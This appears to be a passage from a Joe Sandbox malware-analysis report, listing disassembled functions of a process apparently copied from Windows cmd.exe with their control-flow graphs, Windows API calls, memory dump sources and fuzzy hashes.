                                        • Instruction ID: 8f571fb85f9a1f73d9cef481c7cdf4a233d53ae82f206b9040e91fb5fa649a2a
                                        • Opcode Fuzzy Hash: 989dfed76e83e1e5127155f56046364be98515c6956e9669bb0cf7002a0e13e4
                                        • Instruction Fuzzy Hash: 20C17E61B0C64281EA54BF16D814679E2A2EF90BB0FC45131DF6E872D5FF3CEA448720
                                        Function 00007FF7CD498D80 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1171 7ff7cd498d80-7ff7cd498da2 1172 7ff7cd498da4-7ff7cd498daf 1171->1172 1173 7ff7cd498db1-7ff7cd498db4 1172->1173 1174 7ff7cd498dcc 1172->1174 1175 7ff7cd498dbf-7ff7cd498dca Sleep 1173->1175 1176 7ff7cd498db6-7ff7cd498dbd 1173->1176 1177 7ff7cd498dd1-7ff7cd498dd9 1174->1177 1175->1172 1176->1177 1178 7ff7cd498de7-7ff7cd498def 1177->1178 1179 7ff7cd498ddb-7ff7cd498de5 _amsg_exit 1177->1179 1181 7ff7cd498df1-7ff7cd498e0a 1178->1181 1182 7ff7cd498e46 1178->1182 1180 7ff7cd498e4c-7ff7cd498e54 1179->1180 1184 7ff7cd498e73-7ff7cd498e75 1180->1184 1185 7ff7cd498e56-7ff7cd498e69 _initterm 1180->1185 1183 7ff7cd498e0e-7ff7cd498e11 1181->1183 1182->1180 1186 7ff7cd498e13-7ff7cd498e15 1183->1186 1187 7ff7cd498e38-7ff7cd498e3a 1183->1187 1188 7ff7cd498e80-7ff7cd498e88 1184->1188 1189 7ff7cd498e77-7ff7cd498e79 1184->1189 1185->1184 1192 7ff7cd498e17-7ff7cd498e1b 1186->1192 1193 7ff7cd498e3c-7ff7cd498e41 1186->1193 1187->1180 1187->1193 1190 7ff7cd498eb4-7ff7cd498ec8 call 7ff7cd4937d8 1188->1190 1191 7ff7cd498e8a-7ff7cd498e98 call 7ff7cd4994f0 1188->1191 1189->1188 1200 7ff7cd498ecd-7ff7cd498eda 1190->1200 1191->1190 1201 7ff7cd498e9a-7ff7cd498eaa 1191->1201 1195 7ff7cd498e2d-7ff7cd498e36 1192->1195 1196 7ff7cd498e1d-7ff7cd498e29 1192->1196 1198 7ff7cd498f28-7ff7cd498f3d 1193->1198 1195->1183 1196->1195 1203 7ff7cd498ee4-7ff7cd498eeb 1200->1203 1204 7ff7cd498edc-7ff7cd498ede exit 1200->1204 1201->1190 1205 7ff7cd498ef9 1203->1205 1206 7ff7cd498eed-7ff7cd498ef3 _cexit 1203->1206 1204->1203 1205->1198 1206->1205
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                        • String ID:
                                        • API String ID: 4291973834-0
                                        • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                        • Instruction ID: 1ffb054e2dd3121d3e0774b0eddbd44d01c492bf22b47cf440d3cf454bdddd57
                                        • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                        • Instruction Fuzzy Hash: 28412A21B0CA4392FA54BF56E854635F2A6AB64364F840475DF7E836A0FF3CEA408760
                                        Function 00007FF7CD4889C0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1207 7ff7cd4889c0-7ff7cd488a3d memset call 7ff7cd48ca40 1210 7ff7cd488a43-7ff7cd488a71 GetDriveTypeW 1207->1210 1211 7ff7cd488ace-7ff7cd488adf 1207->1211 1212 7ff7cd49b411-7ff7cd49b422 1210->1212 1213 7ff7cd488a77-7ff7cd488a7a 1210->1213 1214 7ff7cd488ae1-7ff7cd488ae8 ??_V@YAXPEAX@Z 1211->1214 1215 7ff7cd488aed 1211->1215 1218 7ff7cd49b430-7ff7cd49b435 1212->1218 1219 7ff7cd49b424-7ff7cd49b42b ??_V@YAXPEAX@Z 1212->1219 1213->1211 1216 7ff7cd488a7c-7ff7cd488a7f 1213->1216 1214->1215 1217 7ff7cd488aef-7ff7cd488b16 call 7ff7cd498f80 1215->1217 1216->1211 1220 7ff7cd488a81-7ff7cd488ac8 GetVolumeInformationW 1216->1220 1218->1217 1219->1218 1220->1211 1222 7ff7cd49b3fc-7ff7cd49b40b GetLastError 1220->1222 1222->1211 1222->1212
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$DriveErrorInformationLastTypeVolume
                                        • String ID:
                                        • API String ID: 850181435-0
                                        • Opcode ID: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
                                        • Instruction ID: dbcf1004a4bf246e01c8b7cc3b56b60156aa305da354e0296cba6286dcce7357
                                        • Opcode Fuzzy Hash: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
                                        • Instruction Fuzzy Hash: E5415B32608AC1CAE7609F21E8442F9B7A5FB89B94F844125DF5D8BB48EF38D645C720
                                        Function 00007FF7CD494A14 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1224 7ff7cd494a14-7ff7cd494a3e GetEnvironmentStringsW 1225 7ff7cd494a40-7ff7cd494a46 1224->1225 1226 7ff7cd494aae-7ff7cd494ac5 1224->1226 1227 7ff7cd494a48-7ff7cd494a52 1225->1227 1228 7ff7cd494a59-7ff7cd494a8f GetProcessHeap HeapAlloc 1225->1228 1227->1227 1229 7ff7cd494a54-7ff7cd494a57 1227->1229 1230 7ff7cd494a9f-7ff7cd494aa9 FreeEnvironmentStringsW 1228->1230 1231 7ff7cd494a91-7ff7cd494a9a memmove 1228->1231 1229->1227 1229->1228 1230->1226 1231->1230
                                        APIs
                                        • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A28
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A66
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A7D
                                        • memmove.MSVCRT(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A9A
                                        • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494AA2
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                        • String ID:
                                        • API String ID: 1623332820-0
                                        • Opcode ID: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                                        • Instruction ID: 9fcb93c2cd7292d546464a98fe52d482dbf1a45eb43bffc32bc547e889ee94d9
                                        • Opcode Fuzzy Hash: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                                        • Instruction Fuzzy Hash: F4119421B19B5182DE10AF87B404039FBE5EB89FE0B899038DF5E03744EE3DE5418754
                                        Function 00007FF7CD495CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                        • String ID:
                                        • API String ID: 1826527819-0
                                        • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                        • Instruction ID: 9dc8317a1de584d270973856201a4efd1fc7ed60b19a5814ba1f78276d8a0196
                                        • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                        • Instruction Fuzzy Hash: 88015221B0CA429AEA047F56A444178FE61EB5A761FC46170DE6F06355EF3C91448B20
                                        Function 00007FF7CD493060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF7CD491EA0: wcschr.MSVCRT(?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7CD4B0D54), ref: 00007FF7CD491EB3
                                        • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7CD4892AC), ref: 00007FF7CD4930CA
                                        • SetErrorMode.KERNELBASE ref: 00007FF7CD4930DD
                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD4930F6
                                        • SetErrorMode.KERNELBASE ref: 00007FF7CD493106
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ErrorMode$FullNamePathwcschr
                                        • String ID:
                                        • API String ID: 1464828906-0
                                        • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                        • Instruction ID: ac25019f9a086734ea65ca7854a2d03bef520ecf219e55c45c08863e416080cb
                                        • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                        • Instruction Fuzzy Hash: 4531B121B0C65186E724AF56A40487EF666EB46BB0FD88135DF6A433E0FE7DEA458310
                                        Function 00007FF7CD48CA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                        • API String ID: 2221118986-3416068913
                                        • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                        • Instruction ID: 456e0d7ef2fa96da204cd4c8e6b2dc9efae1961007f89ff22fde948ce0e5b69f
                                        • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                        • Instruction Fuzzy Hash: B911C621B0CA4281EF54EF56A5543B9A2919F88BF4F984231DF7D4B7D5FE2CD6804320
                                        Function 00007FF7CD48BE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memsetwcschr
                                        • String ID: 2$COMSPEC
                                        • API String ID: 1764819092-1738800741
                                        • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                        • Instruction ID: d1c33f23c626ab1afd69d19803f46a345b10e057b62c44db5503088fa6b027fb
                                        • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                        • Instruction Fuzzy Hash: E0516721B0C7424DFB61BE21A841379A3959F947E4F884031DF2DC2296FF2CEA84C762
                                        Function 00007FF7CD492EFC Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                        • String ID:
                                        • API String ID: 4254246844-0
                                        • Opcode ID: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                        • Instruction ID: 9e03c497e47dd2db37088e7519ea907d38cebee0077392523d1912e4a6183d46
                                        • Opcode Fuzzy Hash: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                        • Instruction Fuzzy Hash: F941B521B0D64286EA10AF02E444B79FBA6EF85774FC84531DF6D47789FE3CE6458620
                                        Function 00007FF7CD49498C Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$EnvironmentFreeProcessVariable
                                        • String ID:
                                        • API String ID: 2643372051-0
                                        • Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                        • Instruction ID: 72132c771c915d95690a7f4e91faf661eb74fd82ae95d44ea265b864f1bfeb28
                                        • Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                        • Instruction Fuzzy Hash: 4EF04471B1DA4185DA00AF76E404075EAA2FF99770B959234CE7D03390EE3C95448110
                                        Function 00007FF7CD495A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _get_osfhandle$ConsoleMode
                                        • String ID:
                                        • API String ID: 1591002910-0
                                        • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                        • Instruction ID: 3ee5a69df7da1185df661c73517019a5d84c8c06ae35e008189bc65897c6b89d
                                        • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                        • Instruction Fuzzy Hash: 28F07A35B0DA02DBE604AF91E845078BBA1FBD9721F844135CF1E43310EF3CA6058B10
                                        Function 00007FF7CD49291C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: DriveType
                                        • String ID: :
                                        • API String ID: 338552980-336475711
                                        • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                        • Instruction ID: 87b4f97b760e773a23a39c48b0277e9dea9a196d5fc726670a0d5a5fb18d96fb
                                        • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                        • Instruction Fuzzy Hash: 24E0E56371CA0086D7209F50E05106AF761FB9C318FC41524DE9D83724EB3CC249CB08
                                        Function 00007FF7CD495AD8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF7CD48CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDA6
                                          • Part of subcall function 00007FF7CD48CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDBD
                                        • GetConsoleTitleW.KERNELBASE ref: 00007FF7CD495B52
                                          • Part of subcall function 00007FF7CD494224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7CD494297
                                          • Part of subcall function 00007FF7CD494224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7CD4942D7
                                          • Part of subcall function 00007FF7CD494224: memset.MSVCRT ref: 00007FF7CD4942FD
                                          • Part of subcall function 00007FF7CD494224: memset.MSVCRT ref: 00007FF7CD494368
                                          • Part of subcall function 00007FF7CD494224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7CD494380
                                          • Part of subcall function 00007FF7CD494224: wcsrchr.MSVCRT ref: 00007FF7CD4943E6
                                          • Part of subcall function 00007FF7CD494224: lstrcmpW.KERNELBASE ref: 00007FF7CD494401
                                        • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7CD495BC7
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                        • String ID:
                                        • API String ID: 497088868-0
                                        • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                        • Instruction ID: 6f6469b6073026cebfd4c324978a8a0876d546d0810f3499dae31ddee4b5754b
                                        • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                        • Instruction Fuzzy Hash: 87319720B0C64242FA24BF12A45457DE296BF89BE0FD45031DF6E87B95FE3CE6028720
                                        Function 00007FF7CD493A0C Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindClose.KERNELBASE(?,?,?,00007FF7CD4AEAC5,?,?,?,00007FF7CD4AE925,?,?,?,?,00007FF7CD48B9B1), ref: 00007FF7CD493A56
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
